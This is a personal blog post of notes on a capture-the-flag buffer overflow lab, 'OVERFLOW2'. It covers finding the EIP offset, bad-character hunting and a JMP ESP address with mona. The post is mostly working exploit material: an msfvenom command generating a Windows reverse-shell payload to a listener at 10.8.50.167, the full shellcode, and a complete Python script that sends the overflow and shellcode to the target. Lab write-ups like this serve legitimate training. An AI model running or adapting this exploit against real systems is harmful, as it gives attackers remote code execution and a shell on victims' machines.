Buffer Overflow Prep 2

CTF Buffer overflow
Created At :
Count:2k Views 👀 :
  1. Finding Bad Characters
  2. Find the jump point
  3. Gereate the payload
  4. exploit
  5. Conclusion

It’s the same thing as the prep 1, but I still writing it because it’s my notes.

Crashing at 630, it’s useless to be presice like this.
If you enter only “A” chars you won’t see the offset in the EIP, he need a patern.
https://wiremask.eu/tools/buffer-overflow-pattern-generator/

So it’s crashing between 600 and 700, let’s create a string of 300”A” + 400”patern”.

0x6c41316c offset 334

Offset 334, that’s mean 300”A” + 334”patern”.
So now I can do 300+334=634, “A”334 + “B”4

View > log (alt +l)
!mona findmsp -distance 600

42424242 is my BBBB. So I found the EIP

Finding Bad Characters

For mona:

!mona bytearray -b "\x00"

For me:

\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff

Restart the program then:

nc 10.10.35.232 1337 <<< "OVERFLOW2 "$(python -c 'print( "A"*634 + "B"*4 + "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")')

!mona compare -f C:\mona\oscp\bytearray.bin -a esp

I got it, it’s because i’m using bash and not python so maybe there is problem of encoding.

import socket

ip = "10.10.35.232"
port = 1337

prefix = "OVERFLOW2 "
offset = 634
overflow = "A" * offset
retn = "BBBB"
padding = ""
payload = "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
postfix = ""

buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
  s.connect((ip, port))
  print("Sending evil buffer...")
  s.send(bytes(buffer + "\r\n", "latin-1"))
  print("Done!")
except:
  print("Could not connect.")

BadChars: \x00\x23\x3c\x83\xba

!mona bytearray -b "\x00\x23\x3c\x83\xba"

I modify my payload to remove the BadChars.

Find the jump point

!mona jmp -r esp -cpb "\x00\x23\x3c\x83\xba"

So 625011af = \xaf\x11\x50\x62
It will be our jmp. we need to place it into the EIP, so instead the BBBB

prefix = "OVERFLOW2 "
offset = 634
overflow = "A" * offset
retn = "\xaf\x11\x50\x62"
padding = "\x90" * 16

Gereate the payload

msfvenom -p windows/shell_reverse_tcp LHOST=10.8.50.167 LPORT=4848 EXITFUNC=thread -b "\x00\x23\x3c\x83\xba" -f c

Output:

"\xfc\xbb\xcf\x2d\xa4\x5e\xeb\x0c\x5e\x56\x31\x1e\xad\x01"
"\xc3\x85\xc0\x75\xf7\xc3\xe8\xef\xff\xff\xff\x33\xc5\x26"
"\x5e\xcb\x16\x47\xd6\x2e\x27\x47\x8c\x3b\x18\x77\xc6\x69"
"\x95\xfc\x8a\x99\x2e\x70\x03\xae\x87\x3f\x75\x81\x18\x13"
"\x45\x80\x9a\x6e\x9a\x62\xa2\xa0\xef\x63\xe3\xdd\x02\x31"
"\xbc\xaa\xb1\xa5\xc9\xe7\x09\x4e\x81\xe6\x09\xb3\x52\x08"
"\x3b\x62\xe8\x53\x9b\x85\x3d\xe8\x92\x9d\x22\xd5\x6d\x16"
"\x90\xa1\x6f\xfe\xe8\x4a\xc3\x3f\xc5\xb8\x1d\x78\xe2\x22"
"\x68\x70\x10\xde\x6b\x47\x6a\x04\xf9\x53\xcc\xcf\x59\xbf"
"\xec\x1c\x3f\x34\xe2\xe9\x4b\x12\xe7\xec\x98\x29\x13\x64"
"\x1f\xfd\x95\x3e\x04\xd9\xfe\xe5\x25\x78\x5b\x4b\x59\x9a"
"\x04\x34\xff\xd1\xa9\x21\x72\xb8\xa5\x86\xbf\x42\x36\x81"
"\xc8\x31\x04\x0e\x63\xdd\x24\xc7\xad\x1a\x4a\xf2\x0a\xb4"
"\xb5\xfd\x6a\x9d\x71\xa9\x3a\xb5\x50\xd2\xd0\x45\x5c\x07"
"\x76\x15\xf2\xf8\x37\xc5\xb2\xa8\xdf\x0f\x3d\x96\xc0\x30"
"\x97\xbf\x6b\xcb\x70\xca\x63\xe1\x27\xa2\x71\x05\x3a\xc3"
"\xff\xe3\x50\x33\x56\xbc\xcc\xaa\xf3\x36\x6c\x32\x2e\x33"
"\xae\xb8\xdd\xc4\x61\x49\xab\xd6\x16\xb9\xe6\x84\xb1\xc6"
"\xdc\xa0\x5e\x54\xbb\x30\x28\x45\x14\x67\x7d\xbb\x6d\xed"
"\x93\xe2\xc7\x13\x6e\x72\x2f\x97\xb5\x47\xae\x16\x3b\xf3"
"\x94\x08\x85\xfc\x90\x7c\x59\xab\x4e\x2a\x1f\x05\x21\x84"
"\xc9\xfa\xeb\x40\x8f\x30\x2c\x16\x90\x1c\xda\xf6\x21\xc9"
"\x9b\x09\x8d\x9d\x2b\x72\xf3\x3d\xd3\xa9\xb7\x5e\x36\x7b"
"\xc2\xf6\xef\xee\x6f\x9b\x0f\xc5\xac\xa2\x93\xef\x4c\x51"
"\x8b\x9a\x49\x1d\x0b\x77\x20\x0e\xfe\x77\x97\x2f\x2b\x77"
"\x17\xd0\xd4";

exploit

import socket

ip = "10.10.35.232"
port = 1337

prefix = "OVERFLOW2 "
offset = 634
overflow = "A" * offset
retn = "\xaf\x11\x50\x62"
padding = "\x90" * 16

payload=("\xfc\xbb\xcf\x2d\xa4\x5e\xeb\x0c\x5e\x56\x31\x1e\xad\x01"
"\xc3\x85\xc0\x75\xf7\xc3\xe8\xef\xff\xff\xff\x33\xc5\x26"
"\x5e\xcb\x16\x47\xd6\x2e\x27\x47\x8c\x3b\x18\x77\xc6\x69"
"\x95\xfc\x8a\x99\x2e\x70\x03\xae\x87\x3f\x75\x81\x18\x13"
"\x45\x80\x9a\x6e\x9a\x62\xa2\xa0\xef\x63\xe3\xdd\x02\x31"
"\xbc\xaa\xb1\xa5\xc9\xe7\x09\x4e\x81\xe6\x09\xb3\x52\x08"
"\x3b\x62\xe8\x53\x9b\x85\x3d\xe8\x92\x9d\x22\xd5\x6d\x16"
"\x90\xa1\x6f\xfe\xe8\x4a\xc3\x3f\xc5\xb8\x1d\x78\xe2\x22"
"\x68\x70\x10\xde\x6b\x47\x6a\x04\xf9\x53\xcc\xcf\x59\xbf"
"\xec\x1c\x3f\x34\xe2\xe9\x4b\x12\xe7\xec\x98\x29\x13\x64"
"\x1f\xfd\x95\x3e\x04\xd9\xfe\xe5\x25\x78\x5b\x4b\x59\x9a"
"\x04\x34\xff\xd1\xa9\x21\x72\xb8\xa5\x86\xbf\x42\x36\x81"
"\xc8\x31\x04\x0e\x63\xdd\x24\xc7\xad\x1a\x4a\xf2\x0a\xb4"
"\xb5\xfd\x6a\x9d\x71\xa9\x3a\xb5\x50\xd2\xd0\x45\x5c\x07"
"\x76\x15\xf2\xf8\x37\xc5\xb2\xa8\xdf\x0f\x3d\x96\xc0\x30"
"\x97\xbf\x6b\xcb\x70\xca\x63\xe1\x27\xa2\x71\x05\x3a\xc3"
"\xff\xe3\x50\x33\x56\xbc\xcc\xaa\xf3\x36\x6c\x32\x2e\x33"
"\xae\xb8\xdd\xc4\x61\x49\xab\xd6\x16\xb9\xe6\x84\xb1\xc6"
"\xdc\xa0\x5e\x54\xbb\x30\x28\x45\x14\x67\x7d\xbb\x6d\xed"
"\x93\xe2\xc7\x13\x6e\x72\x2f\x97\xb5\x47\xae\x16\x3b\xf3"
"\x94\x08\x85\xfc\x90\x7c\x59\xab\x4e\x2a\x1f\x05\x21\x84"
"\xc9\xfa\xeb\x40\x8f\x30\x2c\x16\x90\x1c\xda\xf6\x21\xc9"
"\x9b\x09\x8d\x9d\x2b\x72\xf3\x3d\xd3\xa9\xb7\x5e\x36\x7b"
"\xc2\xf6\xef\xee\x6f\x9b\x0f\xc5\xac\xa2\x93\xef\x4c\x51"
"\x8b\x9a\x49\x1d\x0b\x77\x20\x0e\xfe\x77\x97\x2f\x2b\x77"
"\x17\xd0\xd4")

postfix = ""

buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
  s.connect((ip, port))
  print("Sending evil buffer...")
  s.send(bytes(buffer + "\r\n", "latin-1"))
  print("Done!")
except:
  print("Could not connect.")

Indeed, it’s better when I use rhe right tools.

Conclusion

    1. Find where it’s craching (aproximatively)
    1. remove 200 chars, add 300 ofset to locate where in the ofset it’s crashing
    1. Add BBBB to be sure I’m at the EIP.
    1. Generate bytearray with mona and Inject the same after BBBB with the script (not working with bash)
    1. Find the bad chars
    1. Find the jump
    1. Create the payload without the BadChars
    1. add the jpm Value in EIP, the NOPS then the payload

©2021 Peanutstick's Blog

Built with Hexo and 3-hexo theme